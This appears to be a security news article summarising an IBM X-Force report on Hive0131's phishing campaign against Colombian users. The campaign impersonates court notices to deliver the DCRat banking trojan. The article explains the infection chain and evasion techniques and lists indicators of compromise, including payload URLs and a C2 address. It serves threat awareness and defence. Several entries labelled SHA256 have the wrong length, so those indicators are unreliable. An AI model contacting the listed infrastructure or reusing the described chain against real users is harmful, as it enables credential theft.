IBM X-Force researchers identified a wave of targeted phishing campaigns in Colombia delivering the DCRat banking trojan.
Attributed to threat actor group Hive0131, these attacks leveraged fraudulent electronic notifications purporting to originate from the Judiciary of Colombia (Rama Judicial de Colombia).
The operation primarily sought to harvest banking credentials and sensitive user data from entities within the Latin American (LATAM) region, leveraging advancements in malware delivery and evasion techniques.
Hive0131, a financially motivated group likely originating from South America, has a history of conducting widespread commodity malware campaigns across LATAM.
The recent activity marks a shift in tactics, employing either embedded links or PDF lures in phishing emails to initiate the infection chain.
Once the embedded links are clicked, the infection proceeds through a multi-stage process designed to evade detection and execute DCRat entirely in memory.
Technical Analysis of the Attack Chain
Two primary infection vectors were observed. The first involves phishing emails containing PDFs with embedded TinyURL links.
These redirect victims to a ZIP archive named to mimic official judicial notifications. The archive contains a benign file alongside a malicious JavaScript (.js) component, which in turn downloads a secondary payload via a paste[.]ee URL.
This payload triggers a PowerShell command, resulting in the download and execution of a JPEG file from archive[.]org this file contains a base64-encoded, obfuscated .NET loader dubbed VMDetectLoader. Once run, VMDetectLoader retrieves and executes DCRat in memory.
The alternative infection vector leverages Google Docs links to download password-protected ZIP archives. These contain batch file downloaders that execute obfuscated VBScript (VBS) files.
The VBS scripts decode and launch PowerShell, which downloads another JPG file acting as a carrier for the base64-encoded VMDetectLoader. The loader then deploys DCRat using process injection techniques.
VMDetectLoader distinguishes itself through robust anti-analysis capabilities, including virtual machine and sandbox detection, string obfuscation, and dynamic payload decryption.
It establishes persistence by creating scheduled tasks or registry keys, and utilizes process hollowing to inject DCRat into legitimate Windows processes (notably MSBuild.exe).
The loader’s code is based on the open-source VMDetector project, with customized enhancements for stealth and flexibility.
DCRat Malware-as-a-Service(MaaS) Operations
DCRat, active since at least 2018 and sold cheaply on Russian cybercrime forums, operates as a Malware-as-a-Service (MaaS) and has gained popularity among LATAM threat actors since 2024.
Its plugin-based architecture enables operators to expand capabilities, including system information theft, file manipulation, keystroke logging, and audio/video recording.
Notably, it can bypass Windows AMSI, evade analysis, terminate security processes, and maintain persistence.
Once executed, DCRat maintains communication with remote C2 infrastructure, receiving operator commands and exfiltrating harvested data.
Configuration analysis of recent samples revealed command servers hosted on dynamic DNS domains and usage of strong AES-CBC and HMAC-SHA256 cryptography for communication.
Process injection and memory-only execution make detection and remediation challenging.
This campaign exemplifies the evolving threat landscape targeting Latin American banking users through sophisticated phishing and malware deployment.
While Hive0131 previously favored banking trojans like QuasarRAT and NjRAT, the uptick in DCRat deployment highlights the adaptability of financially motivated attackers.
According to the Report, IBM X-Force expects ongoing and varied infiltration attempts, with banking credentials and sensitive user information remaining prime targets.
Organizations in LATAM are advised to treat unsolicited emails and attachments with caution, monitor for evidence of process injection or persistence mechanisms, and ensure endpoint protection solutions are fully updated and configured to detect advanced malware behaviors.
Indicators of Compromise (IOC)
| Indicator | Type | Context |
|---|---|---|
| 1603c606d62e7794da09c51ca7f321bb5550449165b4fe81153020021cbce140 | SHA256 | DCRat Payload |
| 0df13fd42fb4a4374981474ea87895a3830eddcc7f3bd494e76acd604c4004f7 | SHA256 | Obfuscated .NET Loader (VMDetectLoader) |
| 4ce1d456fa8831733ac01c4a2a32044b6581664d3 | SHA256 | Carrier File |
| 6a632d8356f42694adb21c064aa9e8710b65addd | SHA256 | ZIP Archive |
| fdf2209d293ded12fe3d46a7 | SHA256 | ZIP Archive |
| ceb88c09069b5ddc8ca525b7f2e26c4852465bc0 | SHA256 | JavaScript Payload |
| hxxps://tinyurl[.]com/2ypy4jrz?id=5541213d-0ed8-4516-82e7-5460d4ebaf3b | URL | Embedded PDF Link |
| hxxp://paste[.]ee/d/bx699sF9/0 | URL | Payload Download URL |
| hxxps://docs[.]google[.]com/uc?export=download&id=1aJuQtm8YUqZv12E-atslt_GvBWZNbWIK | URL | Embedded Email Link |
| hxxps://archive[.]org/download/new_ABBAS/new_ABBAS.jpg | URL | JPG Download URL |
| hxxps://ia601205.us.archive[.]org/26/items/new_image_20250430/new_image.jpg | URL | JPG Download URL |
| c2: feb18.freeddns.org:8848 | C2 Address | Command and Control Server |
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates
